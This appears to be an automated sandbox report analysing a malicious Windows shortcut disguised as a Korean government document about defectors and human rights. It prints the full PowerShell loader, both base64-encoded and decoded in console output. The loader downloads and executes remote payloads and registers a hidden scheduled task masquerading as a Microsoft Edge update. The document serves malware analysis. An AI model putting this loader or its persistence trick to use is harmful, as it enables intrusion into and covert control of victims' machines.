Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 21, 2024, 3:17 p.m.	Aug. 21, 2024, 3:19 p.m.

Size	310.8KB
Type	MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`028075a00beb580aae25e2d60180889f`
SHA256	`1d5d65f2eb065bac629c82a3399fbdc28ebe33eb288c1cd556cca6b4e6230b52`
CRC32	`A65B637A`
ssdeep	`1536:Q8tPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLo:2`
Yara	Antivirus - Contains references to security software lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "puWJNPHefC" "C:\Users\test22\AppData\Local\Temp\통일부 5월 간담회 계획안(줄리 터너대사 방한건_인권 탈북).docx.lnk"
2552
- powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss =\"JGhoaCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIu2GteydvOu2gCA17JuUIOqwhOuLtO2ajCDqs4Ttmo3slYgo7KSE66asIO2EsOuEiOuMgOyCrCDrsKntlZzqsbRf7J246raMIO2DiOu2gSkuZG9jeCI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHA6Ly8xMjcuMC4wLjEvMDUyMS5kb2N4IiAtT3V0RmlsZSAkaGhoOyAmICRoaGg7ICRmaWxlUGF0aCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIm1zX3VwZGF0ZS5wczEiOyAkc3RyID0gJyRhYWEgPSBKb2luLVBhdGggKFtTeXN0ZW0uSU8uUGF0aF06OkdldFRlbXBQYXRoKCkpICJ0dHQucHMxIjsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovLzEyNy4wLjAuMi8wNTIxLXgudHh0IiAtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJlbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgfCBPdXQtRmlsZSAtRmlsZVBhdGggJGZpbGVQYXRoIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRmaWxlUGF0aCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgXCJtc191cGRhdGUucHMxXCI7IHBvd2Vyc2hlbGwgLXdpbmRvd3N0eWxlIGhpZGRlbiAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSAkZmlsZVBhdGg7fSInOyAkdHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2dlciAtT25jZSAtQXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZXBldGl0aW9uSW50ZXJ2YWwgKE5ldy1UaW1lU3BhbiAtTWludXRlcyAzMCk7ICRzZXR0aW5ncyA9IE5ldy1TY2hlZHVsZWRUYXNrU2V0dGluZ3NTZXQgLUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtVGFza05hbWUgIk1pY3Jvc29mdEVkZ2VVcGRhdGVUYXNrTWFjaGluZVRVQUsiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgInN3X2ZpcnN0LnBzMSI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHBzOi8vMTI3LjAuMC4zLzA1MjEtZi50eHQiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = [System.IO.Path]::GetTempPath();$dd = \"hello9.ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; powershell -windowstyle hidden -ExecutionPolicy Bypass $ee"
  2640
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass C:\Users\test22\AppData\Local\Temp\hello9.ps1
    2792

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (14 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 21, 2024, 3:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 3:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 3:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 3:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 3:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 3:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 21, 2024, 3:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 3:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 3:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 3:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 3:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 3:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 21, 2024, 3:17 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 3:17 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 21, 2024, 3:17 p.m.			0	0
IsDebuggerPresent Aug. 21, 2024, 3:17 p.m.			0	0

Command line console output was observed (50 out of 209 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio console_handle: 0x00000023	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\hello9.ps1:1 char:111 console_handle: 0x00000047	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: + $hhh = Join-Path ([System.IO.Path]::GetTempPath()) "통일부 5월 간담회 계획안(줄리 터너대사 방한 console_handle: 0x00000053	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: 건_인권 탈북).docx"; Invoke-WebRequest <<<< -Uri "http://127.0.0.1/0521.docx" -OutF console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: ile $hhh; & $hhh; $filePath = Join-Path ([System.IO.Path]::GetTempPath()) "ms_u console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: pdate.ps1"; $str = '$aaa = Join-Path ([System.IO.Path]::GetTempPath()) "ttt.ps1 console_handle: 0x00000077	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: "; Invoke-WebRequest -Uri "http://127.0.0.2/0521-x.txt" -OutFile $aaa; & $aaa; console_handle: 0x00000083	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: Remove-Item -Path $aaa -Force;'; $str \| Out-File -FilePath $filePath -Encoding console_handle: 0x0000008f	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: UTF8; $action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-W console_handle: 0x0000009b	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: indowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Com console_handle: 0x000000a7	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: mand "& {$filePath = Join-Path ([System.IO.Path]::GetTempPath()) \"ms_update.ps console_handle: 0x000000b3	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: 1\"; powershell -windowstyle hidden -ExecutionPolicy Bypass -File $filePath;}"' console_handle: 0x000000bf	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: ; $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -Repet console_handle: 0x000000cb	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: itionInterval (New-TimeSpan -Minutes 30); $settings = New-ScheduledTaskSettings console_handle: 0x000000d7	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: Set -Hidden; Register-ScheduledTask -TaskName "MicrosoftEdgeUpdateTaskMachineTU console_handle: 0x000000e3	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: AK" -Action $action -Trigger $trigger -Settings $settings; $aaa = Join-Path ([ console_handle: 0x000000ef	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: System.IO.Path]::GetTempPath()) "sw_first.ps1"; Invoke-WebRequest -Uri "https:/ console_handle: 0x000000fb	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: /127.0.0.3/0521-f.txt" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force; console_handle: 0x00000107	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], C console_handle: 0x00000113	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: ommandNotFoundException console_handle: 0x0000011f	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000012b	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: The term 'C:\Users\test22\AppData\Local\Temp\통일부 5월 간담회 계획안(줄리 터너대사 방한건_인권 탈북). console_handle: 0x0000014b	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: docx' is not recognized as the name of a cmdlet, function, script file, or oper console_handle: 0x00000157	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: able program. Check the spelling of the name, or if a path was included, verify console_handle: 0x00000163	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: that the path is correct and try again. console_handle: 0x0000016f	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\hello9.ps1:1 char:162 console_handle: 0x0000017b	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: + $hhh = Join-Path ([System.IO.Path]::GetTempPath()) "통일부 5월 간담회 계획안(줄리 터너대사 방한 console_handle: 0x00000187	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: 건_인권 탈북).docx"; Invoke-WebRequest -Uri "http://127.0.0.1/0521.docx" -OutFile $h console_handle: 0x00000193	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: hh; & <<<< $hhh; $filePath = Join-Path ([System.IO.Path]::GetTempPath()) "ms_u console_handle: 0x0000019f	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: pdate.ps1"; $str = '$aaa = Join-Path ([System.IO.Path]::GetTempPath()) "ttt.ps1 console_handle: 0x000001ab	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: "; Invoke-WebRequest -Uri "http://127.0.0.2/0521-x.txt" -OutFile $aaa; & $aaa; console_handle: 0x000001b7	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: Remove-Item -Path $aaa -Force;'; $str \| Out-File -FilePath $filePath -Encoding console_handle: 0x000001c3	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: UTF8; $action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-W console_handle: 0x000001cf	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: indowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Com console_handle: 0x000001db	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: mand "& {$filePath = Join-Path ([System.IO.Path]::GetTempPath()) \"ms_update.ps console_handle: 0x000001e7	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: 1\"; powershell -windowstyle hidden -ExecutionPolicy Bypass -File $filePath;}"' console_handle: 0x000001f3	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: ; $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -Repet console_handle: 0x000001ff	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: itionInterval (New-TimeSpan -Minutes 30); $settings = New-ScheduledTaskSettings console_handle: 0x0000020b	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: Set -Hidden; Register-ScheduledTask -TaskName "MicrosoftEdgeUpdateTaskMachineTU console_handle: 0x00000217	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: AK" -Action $action -Trigger $trigger -Settings $settings; $aaa = Join-Path ([ console_handle: 0x00000223	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: System.IO.Path]::GetTempPath()) "sw_first.ps1"; Invoke-WebRequest -Uri "https:/ console_handle: 0x0000022f	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: /127.0.0.3/0521-f.txt" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force; console_handle: 0x0000023b	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: + CategoryInfo : ObjectNotFound: (C:\Users\test22...방한건_인권 탈북).do console_handle: 0x00000247	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: cx:String) [], CommandNotFoundException console_handle: 0x00000253	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000025f	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: The term 'New-ScheduledTaskAction' is not recognized as the name of a cmdlet, f console_handle: 0x0000001b	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: unction, script file, or operable program. Check the spelling of the name, or i console_handle: 0x00000027	1	1
WriteConsoleW Aug. 21, 2024, 3:17 p.m.	buffer: f a path was included, verify that the path is correct and try again. console_handle: 0x00000033	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 98 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ec40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f3c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f3c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f3c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f3c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f3c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f3c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f3c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f3c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f3c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f3c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f3c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f3c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f3c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ed40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ed40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ed40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ed40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ed40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ed40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ed40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069dfc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069e800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069e800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069e800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 3:17 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069e9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 21, 2024, 3:17 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 275 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02980000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02762000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02772000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02773000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02774000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 3:17 p.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
